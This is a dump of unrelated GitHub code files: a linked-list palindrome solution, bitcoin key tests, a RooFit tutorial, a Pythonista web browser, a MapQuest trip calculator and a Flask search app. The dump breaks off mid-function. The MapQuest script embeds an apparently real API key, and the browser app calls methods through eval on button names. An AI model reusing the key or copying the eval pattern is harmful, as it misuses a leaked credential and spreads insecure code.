+{"seq_id":"18441134960","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n prev, slow, fast = head, head, head\n while fast and fast.next:\n fast = fast.next.next\n cur_slow, slow = slow, slow.next\n cur_slow.next, prev = prev, cur_slow\n if fast:\n slow = slow.next\n while slow:\n if slow.val != prev.val:\n return False\n slow = slow.next\n prev = prev.next\n return True\n","repo_name":"huytq000605/GrindLC","sub_path":"Linked List/Palindrome Linked List/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34422414331","text":"from bitcoin import privtopub, pubkey_to_address\nfrom gec.contrib.bitcoin import gen_key_pair, gen_random_number, gen_pub_key, gen_address\n\n\ndef test_key():\n priv, pub = gen_key_pair()\n assert pub == privtopub(priv)\n\n\ndef test_addr():\n key = gen_random_number()\n pub = gen_pub_key(key)\n addr = gen_address(key)\n assert addr == pubkey_to_address(pub)\n","repo_name":"RyanKung/gec","sub_path":"tests/test_bitcoin_contrib.py","file_name":"test_bitcoin_contrib.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"10276500822","text":"## \\file\n## \\ingroup tutorial_roofit\n## \\notebook\n## 'BASIC FUNCTIONALITY' RooFit tutorial macro #102\n## Importing data from ROOT TTrees and THx histograms\n##\n## \\macro_image\n## \\macro_code\n## \\macro_output\n##\n## \\date February 2018\n## \\authors Clemens Lange, Wouter Verkerke (C version)\n\nimport ROOT\nfrom array import array\n\n\ndef makeTH1():\n\n # Create ROOT ROOT.TH1 filled with a Gaussian distribution\n\n hh = ROOT.TH1D(\"hh\", \"hh\", 25, -10, 10)\n for i in range(100):\n hh.Fill(ROOT.gRandom.Gaus(0, 3))\n return hh\n\n\ndef makeTTree():\n # Create ROOT ROOT.TTree filled with a Gaussian distribution in x and a\n # uniform distribution in y\n\n tree = ROOT.TTree(\"tree\", \"tree\")\n px = array(\"d\", [0])\n py = array(\"d\", [0])\n tree.Branch(\"x\", px, \"x/D\")\n tree.Branch(\"y\", py, \"y/D\")\n for i in range(100):\n px[0] = ROOT.gRandom.Gaus(0, 3)\n py[0] = ROOT.gRandom.Uniform() * 30 - 15\n tree.Fill()\n return tree\n\n\n############################\n# Importing ROOT 
histograms\n############################\n# Import ROOT TH1 into a RooDataHist\n# ---------------------------------------------------------\n# Create a ROOT TH1 histogram\nhh = makeTH1()\n\n# Declare observable x\nx = ROOT.RooRealVar(\"x\", \"x\", -10, 10)\n\n# Create a binned dataset that imports contents of ROOT.TH1 and associates\n# its contents to observable 'x'\ndh = ROOT.RooDataHist(\"dh\", \"dh\", [x], Import=hh)\n\n# Plot and fit a RooDataHist\n# ---------------------------------------------------\n# Make plot of binned dataset showing Poisson error bars (RooFit default)\nframe = x.frame(Title=\"Imported ROOT.TH1 with Poisson error bars\")\ndh.plotOn(frame)\n\n# Fit a Gaussian p.d.f. to the data\nmean = ROOT.RooRealVar(\"mean\", \"mean\", 0, -10, 10)\nsigma = ROOT.RooRealVar(\"sigma\", \"sigma\", 3, 0.1, 10)\ngauss = ROOT.RooGaussian(\"gauss\", \"gauss\", x, mean, sigma)\ngauss.fitTo(dh, PrintLevel=-1)\ngauss.plotOn(frame)\n\n# Plot and fit a RooDataHist with internal errors\n# ---------------------------------------------------------------------------------------------\n\n# If the histogram has custom errors (i.e. its contents does not originate from a Poisson process\n# but e.g. is a sum of weighted events) you can plot data with symmetric 'sum-of-weights' errors instead\n# (same error bars as shown by ROOT)\nframe2 = x.frame(Title=\"Imported ROOT.TH1 with internal errors\")\ndh.plotOn(frame2, DataError=\"SumW2\")\ngauss.plotOn(frame2)\n\n# Please note that error bars shown (Poisson or SumW2) are for visualization only, they are NOT used\n# in a maximum likelihood fit\n#\n# A (binned) ML fit will ALWAYS assume the Poisson error interpretation of data (the mathematical definition\n# of likelihood does not take any external definition of errors). Data with non-unit weights can only be correctly\n# fitted with a chi^2 fit (see rf602_chi2fit.py)\n#\n# Importing ROOT TTrees\n# -----------------------------------------------------------\n# Import ROOT TTree into a RooDataSet\n\ntree = makeTTree()\n\n# Define 2nd observable y\ny = ROOT.RooRealVar(\"y\", \"y\", -10, 10)\n\n# Construct unbinned dataset importing tree branches x and y. Matching between branches and ROOT.RooRealVars\n# is done by name of the branch/RRV\n#\n# Note that ONLY entries for which x,y have values within their allowed ranges as defined in\n# ROOT.RooRealVar x and y are imported. Since the y values in the import tree are in the range [-15,15]\n# and RRV y defines a range [-10,10] this means that the ROOT.RooDataSet\n# below will have fewer entries than the ROOT.TTree 'tree'\n\nds = ROOT.RooDataSet(\"ds\", \"ds\", {x, y}, Import=tree)\n\n# Use ASCII import/export for datasets\n# ------------------------------------------------------------------------------------\n\n\ndef write_dataset(ds, filename):\n    # Write data to output stream\n    outstream = ROOT.std.ofstream(filename)\n    # Optionally, adjust the stream here (e.g. std::setprecision)\n    ds.write(outstream)\n    outstream.close()\n\n\nwrite_dataset(ds, \"rf102_testData.txt\")\n\n# Read data from input stream. The variables of the dataset need to be supplied\n# to the RooDataSet::read() function.\nprint(\"\\n-----------------------\\nReading data from ASCII\")\ndataReadBack = ROOT.RooDataSet.read(\n    \"rf102_testData.txt\",\n    [x, y],  # variables to be read. If the file has more fields, these are ignored.\n    \"D\",  # Prints if a RooFit message stream listens for debug messages. 
Use Q for quiet.\n)\n\ndataReadBack.Print(\"V\")\n\nprint(\"\\nOriginal data, line 20:\")\nds.get(20).Print(\"V\")\n\nprint(\"\\nRead-back data, line 20:\")\ndataReadBack.get(20).Print(\"V\")\n\n\n# Plot data set with multiple binning choices\n# ------------------------------------------------------------------------------------\n# Print number of events in dataset\nds.Print()\n\n# Print unbinned dataset with default frame binning (100 bins)\nframe3 = y.frame(Title=\"Unbinned data shown in default frame binning\")\nds.plotOn(frame3)\n\n# Print unbinned dataset with custom binning choice (20 bins)\nframe4 = y.frame(Title=\"Unbinned data shown with custom binning\")\nds.plotOn(frame4, Binning=20)\n\nframe5 = y.frame(Title=\"Unbinned data read back from ASCII file\")\nds.plotOn(frame5, Binning=20)\ndataReadBack.plotOn(frame5, Binning=20, MarkerColor=\"r\", MarkerStyle=5)\n\n# Draw all frames on a canvas\nc = ROOT.TCanvas(\"rf102_dataimport\", \"rf102_dataimport\", 800, 800)\nc.Divide(3, 2)\nc.cd(1)\nROOT.gPad.SetLeftMargin(0.15)\nframe.GetYaxis().SetTitleOffset(1.4)\nframe.Draw()\nc.cd(2)\nROOT.gPad.SetLeftMargin(0.15)\nframe2.GetYaxis().SetTitleOffset(1.4)\nframe2.Draw()\nc.cd(4)\nROOT.gPad.SetLeftMargin(0.15)\nframe3.GetYaxis().SetTitleOffset(1.4)\nframe3.Draw()\nc.cd(5)\nROOT.gPad.SetLeftMargin(0.15)\nframe4.GetYaxis().SetTitleOffset(1.4)\nframe4.Draw()\nc.cd(6)\nROOT.gPad.SetLeftMargin(0.15)\nframe4.GetYaxis().SetTitleOffset(1.4)\nframe5.Draw()\n\nc.SaveAs(\"rf102_dataimport.png\")\n","repo_name":"root-project/root","sub_path":"tutorials/roofit/rf102_dataimport.py","file_name":"rf102_dataimport.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":2290,"dataset":"github-code","pt":"57"} +{"seq_id":"29494909917","text":"# coding: utf-8\n\nimport console, json, os, pickle, ui, urlparse\n\nfilename_bookmarks = 'bookmarks.json'\nfilename_history = 'history.txt'\n\nclass BrowserView (ui.View):\n\n\tdef evaluate_javascript(self, js):\n\t\treturn self['webview'].evaluate_javascript(js)\n\t\n\tdef get_title(self):\n\t\treturn self.evaluate_javascript('document.title')\n\n\tdef get_url(self):\n\t\treturn self.evaluate_javascript('window.location.href')\n\n\tdef parse_url(self, url):\n\t\treturn urlparse.urlparse(url).netloc\n\n\tdef set_url(self, url=None):\n\t\turl = url or self.get_url()\n\t\taddr_bar = self['controlpanel']['addressbar']\n\t\tif self.addressbar_is_editing:\n\t\t\taddr_bar.text = url\n\t\t\taddr_bar.alignment = ui.ALIGN_LEFT\n\t\telse:\n\t\t\taddr_bar.text = self.parse_url(url)\n\t\t\taddr_bar.alignment = ui.ALIGN_CENTER\n\n\tdef load_url(self, url):\n\t\tif '.' 
not in url:\n\t\t\turl = 'http://www.google.com/search?q={}'.format(url.replace(' ', '+'))\n\t\telif urlparse.urlparse(url).netloc == '':\n\t\t\turl = 'http://'+url\n\t\tself['webview'].load_url(url)\n\n\tdef load_bookmarks(self, filename=filename_bookmarks):\n\t\ttry:\n\t\t\twith open(filename, 'r+') as f:\n\t\t\t\tbookmarks = json.load(f)\n\t\texcept IOError as e:\n\t\t\tbookmarks = {}\n\t\t\twith open(filename, 'w+') as f:\n\t\t\t\tjson.dump(bookmarks, f, indent=4)\n\t\treturn bookmarks\n\n\tdef load_history(self, filename=filename_history):\n\t\ttry:\n\t\t\twith open(filename, 'r+') as f:\n\t\t\t\thistory = pickle.load(f)\n\t\texcept (IOError, IndexError) as e:\n\t\t\thistory = []\n\t\t\twith open(filename, 'w+') as f:\n\t\t\t\tpickle.dump(history, f)\n\t\treturn history\n\n\tdef init_buttons(self):\n\t\tfor subview in self['controlpanel'].subviews:\n\t\t\tsubview.action = self.button_tapped\n\n\tdef init_addressbar(self):\n\t\taddressbar = self['controlpanel']['addressbar']\n\t\taddressbar.autocapitalization_type = ui.AUTOCAPITALIZE_NONE\n\t\taddressbar.keyboard_type = ui.KEYBOARD_WEB_SEARCH\n\t\taddressbar.clear_button_mode = 'while_editing'\n\t\taddressbar.font = ('<system>', addressbar.height*0.4)\n\t\taddressbar.delegate = self\n\t\taddressbar.action = None\n\n\tdef init_webbrowser(self):\n\t\tweb = self['webview']\n\t\tweb.load_url('https://omz-forums.appspot.com/pythonista')\n\t\tweb.delegate = self\n\t\t\n\tdef init_size(self):\n\t\t# initialize with correct size when landscape\n\t\torientation = ui.WebView(frame=(0,0,100,200)).eval_js('window.orientation')\n\t\tif orientation in (-90, 90):\n\t\t\tself.frame = (0, 0, self.height, self.width)\n\n\tdef did_load(self):\n\t\tself.init_buttons()\n\t\tself.init_webbrowser()\n\t\tself.init_addressbar()\n\t\tself.init_size()\n\t\tself.flex = 'WH'\n\t\tself.bookmarks = self.load_bookmarks()\n\t\tself.history = self.load_history()\n\t\tself.addressbar_is_editing = False\n\t\tself.webpage_has_loaded = False\n\t\tself.favourite_images = {True :ui.Image.named('ionicons-ios7-star-32'),\n\t\tFalse:ui.Image.named('ionicons-ios7-star-outline-32')}\n\n\tdef save_history(self, filename=filename_history):\n\t\twith open(filename, 'w') as f:\n\t\t\turl = self.get_url()\n\t\t\tif url in self.history:\n\t\t\t\tself.history.remove(url)\n\t\t\tself.history.append(url)\n\t\t\tf.seek(0)\n\t\t\tpickle.dump(self.history, f)\n\t\t\t\n\tdef clear_history(self, sender, filename=filename_history):\n\t\twith open(filename, 'w') as f:\n\t\t\tself.history = []\n\t\t\tf.seek(0)\n\t\t\tpickle.dump(self.history, f)\n\t\t\tsender.superview.superview['history'].data_source.items = self.history\n\t\t\tsender.superview.superview['history'].reload()\n\n\tdef save_bookmark(self, filename=filename_bookmarks):\n\t\twith open(filename, 'w') as f:\n\t\t\turl = self.get_url()\n\t\t\ttitle = self.get_title() or self.parse_url(url)\n\t\t\tself.bookmarks[title] = url\n\t\t\tf.seek(0)\n\t\t\tjson.dump(self.bookmarks, f, indent=4)\n\t\t\tself['controlpanel']['favourite'].image = self.favourite_images[True]\n\n\tdef remove_bookmark(self, title=None, filename=filename_bookmarks):\n\t\twith open(filename, 'w') as f:\n\t\t\ttitle = title or self.get_title()\n\t\t\tdel self.bookmarks[title]\n\t\t\tf.seek(0)\n\t\t\tjson.dump(self.bookmarks, f, indent=4)\n\t\t\tself['controlpanel']['favourite'].image = self.favourite_images[False]\n\n\tdef popup_menu(self):\n\t\tpopup = ui.View(name='menu', frame=(0, 0, 320, 500))\n\t\t\n\t\ttoolbar = ui.View(frame=(-5, 0, 330, 100), 
name='toolbar')\n\t\ttoolbar.border_width = 0.5\n\t\ttoolbar.border_color = '#B2B2B2'\n\t\t\n\t\tlabel = ui.Label()\n\t\tlabel.text = 'Bookmarks'\n\t\tlabel.alignment = ui.ALIGN_CENTER\n\t\tlabel.frame = (0, 0, 320, 50)\n\t\tlabel.name = 'title'\n\t\t\n\t\tsegment_ctrl = ui.SegmentedControl(name='segctrl')\n\t\tsegment_ctrl.segments = ['Bookmarks', 'History']\n\t\tsegment_ctrl.width = 170\n\t\tsegment_ctrl.center = popup.center\n\t\tsegment_ctrl.y = label.height\n\t\tsegment_ctrl.selected_index = 0\n\t\tsegment_ctrl.action = self.bookmarks_or_history\n\t\t\n\t\tbutton = ui.Button()\n\t\tbutton.frame = (segment_ctrl.x*3.5, segment_ctrl.y, 60, 30)\n\t\tbutton.font = ('<system>', 15)\n\t\tbutton.title= 'Clear'\n\t\tbutton.name = 'clear'\n\t\tbutton.action = self.clear_history\n\t\tbutton.hidden = True\n\t\t\n\t\ttoolbar.add_subview(label)\n\t\ttoolbar.add_subview(segment_ctrl)\n\t\ttoolbar.add_subview(button)\n\t\t\n\t\tpopup.add_subview(toolbar)\n\t\tdata_source = ui.ListDataSource(sorted(self.bookmarks.keys()))\n\t\tpopup.add_subview(self.list_bookmarks_and_history(data_source, width=320,height=toolbar.superview.height-toolbar.height, y=toolbar.height, name='bookmarks'))\n\t\tx, y = self['controlpanel']['bookmarks'].center\n\t\tpopup.present('popover', popover_location=(x, y), hide_title_bar=True)\n\n\tdef bookmarks_or_history(self, sender):\n\t\ttoolbar = sender.superview\n\t\tif sender.selected_index == 0:\n\t\t\ttoolbar['clear'].hidden = True \n\t\t\ttoolbar['title'].text = 'Bookmarks'\n\t\t\tdata_source = ui.ListDataSource(sorted(self.bookmarks.keys()))\n\t\t\ttv = self.list_bookmarks_and_history(data_source, width=320, height=toolbar.superview.height-toolbar.height, y=toolbar.height, name='bookmarks')\n\t\t\ttoolbar.superview.remove_subview(toolbar.superview['history'])\n\t\telse:\n\t\t\ttoolbar['clear'].hidden = False \n\t\t\ttoolbar['title'].text = 'History'\n\t\t\tdata_source = ui.ListDataSource(self.history[::-1])\n\t\t\ttv = self.list_bookmarks_and_history(data_source, width=320, height=toolbar.superview.height-toolbar.height, y=toolbar.height, name='history')\n\t\t\ttoolbar.superview['bookmarks'].hidden=True\n\t\t\ttoolbar.superview.remove_subview(toolbar.superview['bookmarks'])\n\t\tsender.superview.superview.add_subview(tv)\n\n\tdef list_bookmarks_and_history(self, data_source, **kwargs):\n\t\ttv = ui.TableView()\n\t\ttv.data_source = data_source\n\t\ttv.delegate = self\n\t\tfor k, v in kwargs.items():\n\t\t\tsetattr(tv, k, v)\n\t\treturn tv\n\n\tdef show_more_menu(self):\n\t\tpopup = ui.TableView()\n\t\tpopup.width = 250\n\t\tpopup.height = 500\n\t\tpopup.name = 'More'\n\t\tpopup.data_source = popup.delegate = self\n\t\tbutton = self['controlpanel']['more']\n\t\tpopup.present('popover', popover_location=(button.x, button.y+button.height))\n\n\tdef button_tapped(self, sender):\n\t\tif sender.name == 'favourite':\n\t\t\tif self.get_url() in self.bookmarks.values():\n\t\t\t\tself.remove_bookmark()\n\t\t\telse:\n\t\t\t\tself.save_bookmark()\n\t\telif sender.name == 'bookmarks':\n\t\t\tself.popup_menu()\n\t\telif sender.name == 'more':\n\t\t\tself.show_more_menu()\n\t\telse:\n\t\t\teval(\"self['webview'].{}()\".format(sender.name))\n\n\tdef tableview_number_of_rows(self, tableview, section):\n\t\tif tableview.name == 'Bookmarks':\n\t\t\treturn len(self.bookmarks)\n\t\telif tableview.name == 'More':\n\t\t\treturn 1\n\n\tdef tableview_cell_for_row(self, tableview, section, row):\n\t\tif tableview.name == 'Bookmarks':\n\t\t\tcell = ui.TableViewCell()\n\t\t\tcell.text_label.text = 
sorted(self.bookmarks.keys())[row]\n\t\t\tcell.image_view.image = ui.Image.named('ionicons-ios7-bookmarks-outline-32')\n\t\t\tcell.image_view.tint_color = '#66CCFF'\n\t\t\treturn cell\n\t\telif tableview.name == 'More':\n\t\t\tcell = ui.TableViewCell()\n\t\t\tcell.text_label.text = 'Settings'\n\t\t\tcell.image_view.image = ui.Image.named('ionicons-wrench-32')\n\t\t\treturn cell\n\n\t@ui.in_background\n\tdef tableview_did_select(self, tableview, section, row):\n\t\tif tableview.name == 'bookmarks':\n\t\t\turl = self.bookmarks[sorted(self.bookmarks.keys())[row]]\n\t\t\tself.load_url(url)\n\t\t\ttableview.superview.close()\n\t\telif tableview.name == 'history':\n\t\t\turl = tableview.data_source.items[row]\n\t\t\ttableview.superview.close()\n\t\t\tself.load_url(url)\n\t\telif tableview.name == 'More':\n\t\t\ttableview.close()\n\t\t\tconsole.hud_alert('No settings yet...', 'error', 1)\n\n\tdef tableview_can_delete(self, tableview, section, row):\n\t\treturn True\n\n\tdef tableview_delete(self, tableview, section, row):\n\t\titem = sorted(self.bookmarks.keys())[row]\n\t\tself.remove_bookmark(item)\n\t\ttableview.reload()\n\n\tdef textfield_did_begin_editing(self, textfield):\n\t\tself.addressbar_is_editing = True\n\t\tself.set_url()\n\t\tself['controlpanel']['reload'].hidden = True\n\n\tdef textfield_did_end_editing(self, textfield):\n\t\tself.addressbar_is_editing = False\n\t\tself['controlpanel']['reload'].hidden = False\n\t\tself.set_url()\n\n\tdef textfield_should_return(self, textfield):\n\t\turl = self['controlpanel']['addressbar'].text\n\t\tself.load_url(url)\n\t\ttextfield.end_editing()\n\t\treturn True\n\n\tdef webview_did_start_load(self, webview):\n\t\tself.webpage_has_loaded = False\n\n\tdef webview_did_finish_load(self, webview):\n\t\tif not self.addressbar_is_editing:\n\t\t\tself.set_url()\n\t\t\tself.webpage_has_loaded = True\n\t\tpage_is_bookmarked = unicode(self.get_url()) in self.bookmarks.values()\n\t\tself['controlpanel']['favourite'].image = self.favourite_images[page_is_bookmarked]\n\t\tself.save_history()\n\nview = 'ipad' if ui.get_screen_size()[0] >= 768 else 'iphone'\nbrowser = ui.load_view(view)\nbrowser.present(hide_title_bar=True, style='panel')\n","repo_name":"SebastianJarsve/Pythonista-Webbrowser","sub_path":"webbrowser.py","file_name":"webbrowser.py","file_ext":"py","file_size_in_byte":9330,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"57"} +{"seq_id":"12366714152","text":"import urllib.parse\nimport requests\n\nmain_api = \"https://www.mapquestapi.com/directions/v2/route?\"\nkey = \"D8mFbOQnyE4dMncs0E4ZAjnf3Dtdq8zr\"\nconsumo_combustible = 0.12 # Consumo estimado de combustible en litros por kilómetro\n\nwhile True:\n orig = input(\"Inicio de Viaje: \")\n dest = input(\"Fin del Viaje: \")\n\n if orig.lower() == \"s\" or dest.lower() == \"s\":\n break\n\n url = main_api + urllib.parse.urlencode({\"key\": key, \"from\": orig, \"to\": dest})\n response = requests.get(url)\n data = response.json()\n\n if data[\"info\"][\"statuscode\"] == 0:\n distancia = data[\"route\"][\"distance\"]\n duracion = data[\"route\"][\"formattedTime\"]\n\n duracion_horas, duracion_minutos, duracion_segundos = duracion.split(\":\")\n duracion_horas = int(duracion_horas)\n duracion_minutos = int(duracion_minutos)\n duracion_segundos = int(duracion_segundos)\n\n print(f\"Distancia: {distancia:.1f} km\")\n print(f\"Duración del viaje: {duracion_horas:02d} horas, {duracion_minutos:02d} minutos, {duracion_segundos:02d} segundos\")\n\n 
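# Added note (illustrative, not part of the original script): with the consumo_combustible constant above, a 100 km route needs 0.12 * 100 = 12.0 litres of fuel.\n        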
litros_necesarios = round(consumo_combustible * distancia, 2)\n print(f\"Litros necesarios: {litros_necesarios} L\")\n\n narrativa = f\"Viaje desde {orig} hasta {dest}:\\n\"\n narrativa += f\"- Distancia: {distancia:.2f} km\\n\"\n narrativa += f\"- Duración del viaje: {duracion_horas:02d} horas, {duracion_minutos:02d} minutos, {duracion_segundos:02d} segundos\\n\"\n narrativa += f\"- Litros necesarios: {litros_necesarios} L\\n\"\n\n with open(\"narrativa_viajes.txt\", \"a\") as file:\n file.write(narrativa)\n\n else:\n print(\"No se pudo calcular la ruta. Por favor, intenta nuevamente.\")\n","repo_name":"jocabrerah/Examen_Transversal_Programacion_y_Redes_Virtualizadas_DRY7122","sub_path":"script_medicion_viajes.py","file_name":"script_medicion_viajes.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"42563505583","text":"from flask import Flask, render_template, request\nimport constants\nfrom search_engine import SearchEngine\nfrom web_page import WebPage\nfrom pattern_matcher import PatternMatcher\nfrom suggester import Suggester\nimport pdb\napp = Flask(__name__)\napp.config.from_object(constants)\n\n@app.route(\"/\")\ndef index(name=None):\n return render_template(\"base.html\", name=name)\n\n@app.route(\"/search\", methods=[\"post\"])\ndef search():\n pages = search_by_google_or_bing(request)\n return render_template(\"results.tmpl\", items=pages)\n\n@app.route(\"/search_with_patterns\", methods=[\"post\"])\ndef search_with_patterns():\n query_present = request.form[\"query_present\"]\n query_past = request.form['query_past']\n query_words = request.form['query_words']\n pages = []\n # query_present => '骨折を治す', '猫を預ける'\n pages.extend(with_patterns_to_pages(query_present, 'で'))\n pages.extend(with_patterns_to_pages(query_present, 'に'))\n pages.extend(with_patterns_to_pages(query_present, 'から'))\n # query_past => '骨折が治った', '猫を預けた'\n pages.extend(with_patterns_to_pages(query_past, 'たら'))\n pages.extend(with_patterns_to_pages(query_past, 'で'))\n pages.extend(with_patterns_to_pages(query_past, 'て'))\n pages.extend(with_patterns_to_pages(query_past, 'に'))\n # result_pages = remove_same_keyword_tasks(pages)\n suggested_words = suggestions(query_words)\n return render_template(\"results_with_patterns.tmpl\", items=pages, suggestions=suggested_words)\n\n\ndef remove_same_keyword_tasks(pages):\n result_pages = pages\n for page in pages:\n for i in range(len(pages) - 2):\n # 自分自身と比較はしない\n if page.title == pages[i].title:\n continue\n # 自分自身以外と比較をして、同じキーワードならはじく\n if page.keyword == pages[i].keyword:\n result_pages.pop(i)\n return result_pages\n\n\ndef with_patterns_to_pages(query, word):\n # \"\"で厳密なマッチャで検索する。\n # word => \"で\", \"に\" など\n pm = PatternMatcher('\"' + word + query + '\"')\n pages = pm.bing_search()\n for page in pages:\n page.build_keyword(word + query)\n page.pattern_word = word\n page.query = query\n # page.keywordが''だったら最後に返すpageに入れない\n return [page for page in pages if page.keyword]\n\n\ndef suggestions(query):\n suggester = Suggester()\n suggester.suggest_with_query(query)\n return suggester.suggestions\n\n@app.route(\"/search_and_fetch_headings_and_li_texts\", methods=[\"post\"])\ndef search_and_fetch_headers():\n pages = search_by_google_or_bing(request)\n # 元ページほしい\n results = []\n for page in pages:\n page.fetch_html()\n page.build_heading_tree()\n\n # result[0] => top_nodes\n # result[0][0] => Node\n result = {'title': page.title, 'nodes': page.top_nodes, 'url': 
page.url}\n results.append(result)\n # results[0]['title'] => page.title\n return render_template(\"heading_blocks.tmpl\", results=results)\n\n\n@app.route('/scrape_from_nanapiand_build_heading_tree', methods=['post'])\ndef scrape_from_nanapi_and_build_heading_tree():\n query = request.form['query']\n head = 'http://nanapi.jp/search/q:'\n query_url = head + query\n nanapi_search_result_page = WebPage(query_url)\n nanapi_search_result_page.fetch_html()\n urls = nanapi_search_result_page.find_urls_from_nanapi_search_result()\n results = []\n for url in urls:\n # result_pageはnanapiの1記事\n result_page = WebPage(url)\n result_page.fetch_html()\n result_page.set_title()\n # task_steps => [task_step, task_step, ...]\n result_page.build_heading_tree()\n result = {'title': result_page.title, 'nodes': result_page.top_nodes, 'url': result_page.url}\n results.append(result)\n return render_template('headings_and_li_texts.tmpl', results=results)\n\n\ndef search_by_google_or_bing(request):\n query = request.form[\"query\"]\n search_engine_name = request.form['search_engine']\n search_engine = SearchEngine()\n if search_engine_name == 'google':\n pages = search_engine.google_search(query, 1)\n else:\n pages = search_engine.bing_search(query, 1)\n return pages\n\n\n@app.route('/find_related_action_words', methods=['post'])\ndef find_related_action_words():\n search_engine = SearchEngine()\n search_engine.action_word = request.form['action_word']\n search_engine.hint_word = request.form['hint_word']\n search_engine.find_related_action_words()\n search_engine.count_action_words()\n search_engine.sort_action_words_count()\n for elem in search_engine.sorted_action_words:\n elem['expanded_query'] = search_engine.action_word + ' ' + search_engine.hint_word + ' ' + elem['word']\n return render_template('find_related_action_words.tmpl', items=search_engine.result_pages, sorted_action_words=search_engine.sorted_action_words, found_pages=search_engine.material_pages, query=search_engine.actual_query)\n\n@app.route('/search_in_clueweb_with_expanded_query', methods=['post'])\ndef search_in_clueweb_with_expanded_query():\n search_engine = SearchEngine()\n search_engine.action_word = request.form['action_word']\n search_engine.hint_word = request.form['hint_word']\n search_engine.find_related_action_words_with_google()\n search_engine.count_action_words()\n search_engine.sort_action_words_count()\n search_engine.pick_sorted_action_words_more_than_1_count()\n results = []\n for elem in search_engine.sorted_action_words_more_than_1_count:\n elem['expanded_query'] = search_engine.action_word + ' ' + search_engine.hint_word + ' ' + elem['word']\n url = 'http://karen.dl.local:8983/solr/ClueWeb09ja/select?q=' + elem['expanded_query'] + '&wt=xml'\n web_page = WebPage(url)\n web_page.fetch_xml()\n web_page.pick_texts_to_result_pages()\n # クエリ1つごとに結果xmlページがある\n # 結果xmlページの内容を1ページずつWebPageオブジェクトにしてresult_pagesとして1クエリに対応する結果ページに持たせる\n for result_page in web_page.result_pages:\n # result_page.text_body\n result_page.set_lines_from_texts()\n result_page.set_line_nums_with_word(search_engine.action_word)\n result_page.set_line_nums_around_action_word()\n result_page.set_line_clusters_around_action_word()\n # web_page.result_pages[0].line_clusters_around_action_word\n results.append({'pages': web_page.result_pages, 'expanded_query': elem['expanded_query']})\n return render_template('search_in_clueweb_with_expanded_query.tmpl',\n results=results)\n\n@app.route('/find_words_with_yahoo_ads', methods=['post'])\ndef 
yahoo_sponsored_results():\n query = request.form['query']\n #yahooスポンサードサーチは単語ごとに区切るより一文にしたほうが広告出やすい\n head = 'http://search.yahoo.co.jp/search/ss?p='\n tail = '&ei=UTF-8&fr=top_ga1_sa&type=websearch&x=drt'\n url = head + query + tail\n y_ad_page = WebPage(url)\n y_ad_page.fetch_html()\n y_ad_page.fetch_ads()\n result_words = []\n key_phrases_of_ads = []\n Engine = SearchEngine()\n for ad in y_ad_page.ads:\n result_words.extend(ad.pick_nouns_and_verbs(ad.title))\n result_words.extend(ad.pick_nouns_and_verbs(ad.snippet))\n #key_phrases_of_ads.append(Engine.yahoo_key_phrase(ad.title))\n #key_phrases_of_ads.append(Engine.yahoo_key_phrase(ad.snippet))\n results = to_ranked_items(result_words)\n #return ad_template.render(items=results)\n return render_template('find_words_with_yahoo_ads.tmpl',\n items=results)\n\n@app.route('/find_matched_words_from_yahoo_ads', methods=['post'])\ndef find_matched_words_from_yahoo_ads():\n query = request.form['query']\n #yahooスポンサードサーチは単語ごとに区切るより一文にしたほうが広告出やすい\n head = 'http://search.yahoo.co.jp/search/ss?p='\n tail = '&ei=UTF-8&fr=top_ga1_sa&type=websearch&x=drt'\n url = head + query + tail\n y_ad_page = WebPage(url)\n y_ad_page.fetch_html()\n y_ad_page.fetch_ads()\n naradeha_results = []\n bracket_words = []\n for ad in y_ad_page.ads:\n ad.fetch_link_title()\n naradeha_results.extend(ad.pick_characteristic_words())\n bracket_words.extend(ad.pick_bracket_words())\n # naradeharesults => [{'なら': {'before': ['。', 'あの', '今石洋之']}}]\n # bracket_words => ['アスコルビン酸', 'メルトダウン']\n\n stop_words = ['公式', '楽天', '当日', 'お急ぎ便', 'ココ', 'ここ', 'これ', 'コレ', 'こちら', '公式', '購入', '人気', '詳細', '送料無料', '配送無料', '価格', '激安', '無料', 'アマゾン', 'ヤフオク', '0', '1', '2', '3']\n for num in range(0, 10):\n stop_words.append(str(num))\n results = naradeha_words_to_results(naradeha_results, stop_words)\n\n for bracket_word in bracket_words:\n is_including_stop_word = False\n for stop_word in stop_words:\n if stop_word in bracket_word:\n is_including_stop_word = True\n break\n if is_including_stop_word:\n continue\n results.append(bracket_word)\n\n return render_template('words.tmpl', words=results)\n\n\n@app.route('/scrape_from_nanapi', methods=['post'])\ndef scrape_from_nanapi():\n query = request.form['query']\n head = 'http://nanapi.jp/search/q:'\n query_url = head + query\n nanapi_search_result_page = WebPage(query_url)\n nanapi_search_result_page.fetch_html()\n urls = nanapi_search_result_page.find_urls_from_nanapi_search_result()\n tasks = []\n for url in urls:\n # result_pageはnanapiの1記事\n result_page = WebPage(url)\n result_page.fetch_html()\n # task_steps => [task_step, task_step, ...]\n task = result_page.find_task_from_nanapi_with_headings()\n # task_steps[0].h2 => 'はじめに'\n # task_steps[0].h3s[0] => 'はじめに'\n tasks.append(task)\n # tasks => [task, task, ...]\n # tasks[0][0].h2 => 'はじめに'\n return render_template('nanapi_tasks.tmpl', tasks=tasks)\n\n\n#https://www.google.com/search?as_q=flamenco&as_epq=&as_oq=&as_eq=&as_nlo=&as_nhi=&lr=&cr=&as_qdr=all&as_sitesearch=www.wikihow.com&as_occt=any&safe=images&as_filetype=&as_rights=\n\n\ndef naradeha_words_to_results(naradeha_results, stop_words):\n results = []\n for result in naradeha_results:\n for nara_de_ha in ['nara', 'de', 'ha']:\n for key in ['before', 'after']:\n if not result[nara_de_ha][key]:\n continue\n answer = ''.join(result[nara_de_ha][key])\n # beforeやafterが空白のとき\n is_including_stop_word = False\n for stop_word in stop_words:\n if stop_word in answer:\n is_including_stop_word = True\n break\n if is_including_stop_word:\n continue\n 
